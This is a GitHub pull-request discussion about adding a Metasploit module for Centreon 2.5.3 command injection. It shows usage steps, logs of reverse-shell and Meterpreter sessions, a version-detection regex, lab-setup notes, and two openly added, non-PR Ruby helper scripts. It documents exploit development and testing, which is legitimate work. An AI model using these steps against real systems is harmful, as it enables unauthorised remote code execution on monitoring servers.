
centreon useralias exec #6965

Merged: 7 commits merged on Jul 26, 2016

Conversation


@h00die h00die commented Jun 12, 2016

Adds exploit for Centreon web command injection as documented in EDB 39501

This application had many steps to get installed and working. Please see the doc, as it will assist with links to get your environment installed. I think it took me a little over an hour to install all the components and get the website to load.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Do: use exploit/linux/http/centreon_useralias_exec
  • Do: set payload
  • Do: set rhost
  • Do: set verbose true
  • Do: check
  [+] Version Detected: 2.5.3
  [*] 192.168.2.85:80 The target appears to be vulnerable.
  • Do: exploit
  • Verify the thing does what it should
  [*] Started reverse TCP handler on 192.168.2.229:4444 
  [*] Sending malicious login
  [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400
  whoami
  www-data
  uname -a
  Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

super(
update_info(
info,
'Name' => 'Centreon v2.5.3 Unauthenticated Command Execution',
A Contributor commented on this snippet:

The Name field should begin with the name of the vendor, followed by the software. Ideally the "Root Cause" field means which component or function the bug is found. And finally, the type of vulnerability the module is exploiting.

Another Contributor commented:

And no version either. Leave that to the description or a version field (if we ever get around to it). In general, Name should mimic the module name (or vice versa).


wvu commented Jun 14, 2016

We have #6976 merged in now. It was an example for pull request training. :)

)
/LoginInvitVersion"><br \/>[\s]+(?<version_high>[\d]{1,2})\.(?<version_med>[\d]{1,2})\.(?<version_low>[\d]{1,2})[\s]+<\/td>/ =~ res.body

if version_high && version_med && version_low && \
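The snippet above is the module's version fingerprint: it pulls the major, minor and patch numbers out of the login page's `LoginInvitVersion` cell. The block below is an added example, not code from the PR or from Metasploit, that reuses that exact regex to triage login-page captures from your own Centreon hosts (inventory and patch tracking). The HTML samples are constructed, and the 2.5.3 cut-off is an assumption taken from the module's title; this page does not state the advisory's full affected range.

```ruby
# Added example (not the PR's module code): reuse the module's version regex to
# classify Centreon login pages during an inventory sweep.

# Verbatim from the PR snippet: three named captures, each 1-2 digits.
VERSION_RE = /LoginInvitVersion"><br \/>[\s]+(?<version_high>[\d]{1,2})\.(?<version_med>[\d]{1,2})\.(?<version_low>[\d]{1,2})[\s]+<\/td>/

# Assumption: 2.5.3 is the version the PR targets. The advisory's complete
# affected range is not given on this page, so anything at or below it is
# flagged for review rather than declared safe.
TARGET_VERSION = [2, 5, 3].freeze

# Returns [high, med, low] as integers, or nil when the banner is absent.
def extract_version(html)
  m = VERSION_RE.match(html)
  return nil unless m
  [m[:version_high], m[:version_med], m[:version_low]].map(&:to_i)
end

# Classifies a login page as :not_centreon, :needs_review (at or below the
# target version) or :newer. Array#<=> compares element-wise on integers, so
# 2.5.10 correctly sorts after 2.5.3 (a string compare would get that wrong).
def assess(html)
  v = extract_version(html)
  return :not_centreon if v.nil?
  (v <=> TARGET_VERSION) <= 0 ? :needs_review : :newer
end

# Constructed login-page fragments (not real captures) shaped like the markup
# the regex expects: the cell text is surrounded by whitespace.
SAMPLE_TARGET = <<~HTML
  <table>
    <tr><td class="LoginInvitVersion"><br />
        2.5.3
      </td></tr>
  </table>
HTML
SAMPLE_NEWER = "<td class=\"LoginInvitVersion\"><br />\n 2.7.0 \n</td>"
SAMPLE_OTHER = "<html><body>Some other login form</body></html>"

if __FILE__ == $PROGRAM_NAME
  { target: SAMPLE_TARGET, newer: SAMPLE_NEWER, other: SAMPLE_OTHER }.each do |name, page|
    puts "#{name}: version=#{extract_version(page).inspect} -> #{assess(page)}"
  end
end
```

Feed it the body of an HTTP GET against each host's Centreon login URL; a nil version means the page did not match the banner layout, which is worth a manual look rather than an automatic "not affected".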


h00die commented Jun 20, 2016

@bwatters-r7 I know how much you love setting up difficult/multi-step software packages. This one screams your name!


h00die commented Jun 22, 2016

@wvu-r7 @wchen-r7 anyone want to build a VM and try this? Don't want it to fall too far behind. Software install is ~30min (building the deps to get the website installed)

@bwatters-r7 commented:

I'll hit this when I get back Thursday, unless someone else wants it.



wvu commented Jun 22, 2016

I tried for a couple minutes and then gave up.

@bwatters-r7 bwatters-r7 self-assigned this Jun 23, 2016

bwatters-r7 commented Jun 24, 2016

Abandon hope ye who enter here.

So I spent several hours trying to get a test platform working, and it is extremely unpleasant and the documentation I saw on exploit-db is not really helpful, nor are the conflicting setup documents online, mostly for very old versions of Centreon. The process is pretty long and any one of the settings that you change could break the application and/or the vulnerability. Personally, I gave up on creating the test platform and I'm about to go drink a beer, but if anyone else would like to try, here are the steps I followed in my attempt. I had hoped to find a clear, concise set-up document, but I could not. I tried to make one here, but I gave up. If anyone has such a document, please post it. I think I got close, but got a seg fault when trying to start ndo2db, one of many dependencies. All that being said, I'm not a CentOS/Redhat guy, nor am I familiar with any of the dependency binaries that must be configured for Centreon to work. It is entirely possible that I took a left turn somewhere and the fix is easy.

What I learned I needed to do before even trying to install Centreon:

  • Install CentOS 6.8
  • su -c 'yum update'
  • su -c 'yum install rrdtool'
  • su -c 'yum install php'
  • su -c 'yum install php-pear'
  • su -c 'mkdir /var/log/centreon'
  • try and install nagios and hate the world
  • su -c 'yum install epel-release'
  • su -c 'yum install nagios'
  • su -c 'yum install nagios-plugins-all'
  • Install and configure NDOUtils for Centos (copied from http://joesteinkamp.com/setting-up-ndoutils-for-nagios-on-centos/)
First things, elevate yourself to root.

su root
1. Install GCC and update MySQL

yum install gcc
yum update mysql
yum install mysql-server
yum install mysql-devel
2. Start mysql & Add mysql as Startup service

/etc/init.d/mysqld start
chkconfig --add mysqld
3. Create MySQL Database

mysql
create database nagios;
GRANT ALL ON nagios.* TO nagios@localhost IDENTIFIED BY "nagios";
FLUSH PRIVILEGES;
quit
4. Download and untar the latest release of NDOutils - http://sourceforge.net/projects/nagios/files/ndoutils-1.x/
5. Copy to /tmp/
6. Change directory to /tmp/

cd /tmp/
tar zxfv ndoutils-1.4b9.tar.gz
7. Compile NDOutils

cd /tmp/ndoutils-1.4b9/
./configure
make
8. Make /var/run/nagios folder & Change the ownership to nagios user

mkdir /var/run/nagios
chown nagios:nagios /var/run/nagios
chmod 755 /var/run/nagios
9. Copy appropriate ndo2db.o & ndomod.o /usr/bin and set permissions
"ndo2db-2x.o" & "ndomod-2x.o" for Nagios 2.x
"ndo2db-3x.o" & "ndomod-3x.o" for Nagios 3.x

cp /tmp/ndoutils-1.4b9/src/ndo2db-3x.o /usr/bin/ndo2db
cp /tmp/ndoutils-1.4b9/src/ndomod-3x.o /usr/bin/ndomod
chmod 755 /usr/bin/ndo2db
chmod 755 /usr/bin/ndomod
10. Create NDO database

cd /tmp/ndoutils-1.4b9/src/db

EDIT..... installdb is actually in /tmp/ndoutils-2.0.0/db

./installdb -u nagios -p nagios -h localhost -d nagios
11. Copy configuration files

cp /tmp/ndoutils-1.4b9/config/ndo2db.cfg /etc/nagios
cp /tmp/ndoutils-1.4b9/config/ndomod.cfg /etc/nagios
12. Modify /etc/nagios/ndo2db.cfg

nano /etc/nagios/ndo2db.cfg
Set lock_file=/var/run/nagios/ndo2db.lock
Set ndo2dbuser=nagio and ndo2dbgroup=nagios
Set socket_name=/var/run/nagios/ndo.sock
Set db_host=localhost , db_name=nagios , db_prefix=nagios_ , dp_user=nagios , dp_pass=nagios
Set debug_file=/var/run/nagios/ndo2db.debug
Set time intervals to store data
13. Modify /etc/nagios/ndomod.cfg

nano /etc/nagios/ndomod.cfg
Set output=/var/run/nagios/ndo.sock
Set buffer_file=/var/run/nagios/ndomod.tmp
14. Modify /etc/nagios/nagios.cfg

Add the following line: broker_module=/usr/bin/ndomod config_file=/etc/nagios/ndomod.cfg
15. Change ownership and permissions on config files

chown nagios:nagios /etc/nagios/ndo2db.cfg
chown nagios:nagios /etc/nagios/ndomod.cfg
chmod 664 /etc/nagios/ndo2db.cfg
chmod 664 /etc/nagios/ndomod.cfg
16. Start NDO2DB

/usr/bin/ndo2db -c /etc/nagios/ndo2db.cfg

At this point, I got a seg fault. Walking away for now.


17. Restart Nagios

/etc/init.d/nagios restart

Notes during the actual attempted installation of Centreon:

  • Change location of PEAR.php to /usr/share/pear/PEAR.php
  • Change the nagios plugins directory to /usr/libexec
  • Rethink the life choices that brought you to this point
  • Change Monitoring Engine init.d script to /etc/init.d/nagios
  • Change Monitoring Engine Binary to /usr/sbin/nagios
  • Change Monitoring Configuration directory to /etc/nagios
  • Change configuration directory for broker module to /etc/nagios
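Steps 12 and 13 above are a batch of key=value edits made by hand in nano, which is where a lab rebuild most often drifts. The block below is an added example, not code from the PR or from NDOUtils, that applies those same settings non-interactively and can be re-run safely. The key names follow the sample ndo2db.cfg and ndomod.cfg shipped with NDOUtils as I know them (ndo2db_user, ndo2db_group, db_user, db_pass); the comment above spells a few of them differently, so check them against your copy. The sample config text is constructed.

```ruby
# Added example (not from the PR): apply the ndo2db.cfg / ndomod.cfg edits from
# steps 12-13 without editing by hand. Values are the ones listed in the steps.

# Assumption: stock NDOUtils key names (ndo2db_user rather than ndo2dbuser,
# db_user/db_pass rather than dp_user/dp_pass).
NDO2DB_SETTINGS = {
  "lock_file"    => "/var/run/nagios/ndo2db.lock",
  "ndo2db_user"  => "nagios",
  "ndo2db_group" => "nagios",
  "socket_name"  => "/var/run/nagios/ndo.sock",
  "db_host"      => "localhost",
  "db_name"      => "nagios",
  "db_prefix"    => "nagios_",
  "db_user"      => "nagios",
  "db_pass"      => "nagios",
  "debug_file"   => "/var/run/nagios/ndo2db.debug",
}.freeze

NDOMOD_SETTINGS = {
  "output"      => "/var/run/nagios/ndo.sock",
  "buffer_file" => "/var/run/nagios/ndomod.tmp",
}.freeze

# Rewrites KEY=VALUE lines in config text. An existing line for a managed key
# (active, or commented out with leading '#') is replaced in place so the file
# keeps its layout; keys with no line at all are appended. Every other line,
# including settings this script does not manage, is left untouched.
def apply_settings(text, settings)
  remaining = settings.dup
  lines = text.lines.map do |line|
    if (m = line.match(/\A#*\s*([A-Za-z0-9_]+)=/)) && remaining.key?(m[1])
      "#{m[1]}=#{remaining.delete(m[1])}\n"
    else
      line
    end
  end
  remaining.each { |k, v| lines << "#{k}=#{v}\n" }
  lines.join
end

# Parses the active (uncommented) KEY=VALUE lines back into a hash, to verify
# the result before restarting ndo2db.
def parse_settings(text)
  text.lines.each_with_object({}) do |line, h|
    next if line.start_with?("#")
    k, v = line.chomp.split("=", 2)
    h[k] = v if v
  end
end

# Read-modify-write a real file; run as root on the lab box.
def rewrite_config(path, settings)
  File.write(path, apply_settings(File.read(path), settings))
end

# Constructed stand-in for /etc/nagios/ndo2db.cfg: some keys active with old
# values, one commented out, one (db_port) that we do not manage.
SAMPLE_NDO2DB_CFG = <<~CFG
  # NDO2DB sample config (constructed)
  lock_file=/usr/local/nagios/var/ndo2db.lock
  ndo2db_user=nagios
  #socket_name=/usr/local/nagios/var/ndo.sock
  db_user=ndouser
  db_pass=ndopassword
  db_port=3306
CFG

if __FILE__ == $PROGRAM_NAME
  puts apply_settings(SAMPLE_NDO2DB_CFG, NDO2DB_SETTINGS)
  # rewrite_config("/etc/nagios/ndo2db.cfg", NDO2DB_SETTINGS)
  # rewrite_config("/etc/nagios/ndomod.cfg", NDOMOD_SETTINGS)
end
```

Because a managed key is replaced where it already stands instead of appended, running the script twice produces the same file, and a stray commented-out default cannot shadow the value you intended.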


h00die commented Jun 24, 2016

I will note that if you are in the Web site install portion, not just the command line install, there were like 2 folders or so that I didn't have and was like...... so I just gave it folders that existed. It got me through the install, I'm sure the app itself would be borked, but all you need is the Web login so whatever.
So if you made it to that point, and it seems like it, just flub the folders to get through it.
"Try harder" -muts


h00die commented Jul 20, 2016

@bwatters-r7 pending I get some time tomorrow, I'll rebuild my VM from scratch and take copious notes so you can give this a second try w/ hopefully a better outcome!


h00die commented Jul 20, 2016

@bwatters-r7 ok, I have now redone the instructions, from scratch. From the web install, you'll notice I flub many of the folders. Since we don't need anything to work except the login, it's unimportant. This took me a little over an hour to do. 1 more chance?

@bwatters-r7 commented:

Sweet, @h00die ! I was off-grid last week, but I'll revisit this week.
Thanks

@bwatters-r7 commented:

Test Run

msf > use exploit/linux/http/centreon_useralias_exec 
msf exploit(centreon_useralias_exec) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(centreon_useralias_exec) > set rhost <target_IP>
rhost => <target_IP>
msf exploit(centreon_useralias_exec) > set lhost <msf_IP>
lhost => <msf_IP>
msf exploit(centreon_useralias_exec) > run

[*] Started reverse TCP handler on <msf_IP>:4444 
[*] Sending stage (38474 bytes) to <target_IP>
[*] Meterpreter session 1 opened (<msf_IP>:4444 -> <target_IP>:38480) at 2016-07-26 14:16:58 -0700

meterpreter > sysinfo
Computer     : ubuntu
OS           : Linux 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016
Architecture : x86_64
Meterpreter  : python/python
meterpreter > ifconfig

Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 65536
Flags        : UP LOOPBACK RUNNING
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::


Interface  2
============
Name         : ens33
Hardware MAC : 00:0c:29:ab:c0:a1
MTU          : 1500
Flags        : UP BROADCAST RUNNING MULTICAST
IPv4 Address : <target_IP>
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::7499:a233:61aa:bfcc
IPv6 Netmask : ffff:ffff:ffff:ffff::

meterpreter > 

@bwatters-r7 bwatters-r7 merged commit 5a9f242 into rapid7:master Jul 26, 2016
bwatters-r7 added a commit that referenced this pull request Jul 26, 2016
@bwatters-r7 commented:

Release Notes

Centreon is a free network monitoring software suite, and this module takes advantage of security holes in how Centreon's web portal logs database errors to execute arbitrary code on the remote host.

@bwatters-r7 commented:

@h00die Thanks for the extra guidance; I ran into some other snags, but that was exactly what I needed to get me close enough!
I did add a bit to the documentation without sending you a PR. It was a small change for an issue I ran into. I assumed that you'd be OK with the change, and I wanted to push this up and close the PR.
Great work!


h00die commented Jul 27, 2016

no problem at all!

@h00die h00die deleted the centreon branch July 27, 2016 18:07